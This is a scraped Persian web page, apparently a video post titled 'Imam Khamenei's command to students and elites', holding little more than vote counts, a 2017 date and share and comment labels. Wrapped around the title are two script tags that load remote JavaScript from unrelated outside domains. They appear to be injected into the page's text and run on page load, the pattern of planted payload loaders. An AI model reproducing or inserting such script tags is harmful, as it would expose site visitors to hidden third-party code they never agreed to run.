فرمان امام خامنه ای به دانشجویان و نخبگان


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فرمان امام خامنه ای به دانشجویان و نخبگان<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0
ارسال در 1396/9/16 ساعت 09:31 2017-12-7 08:31:19

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر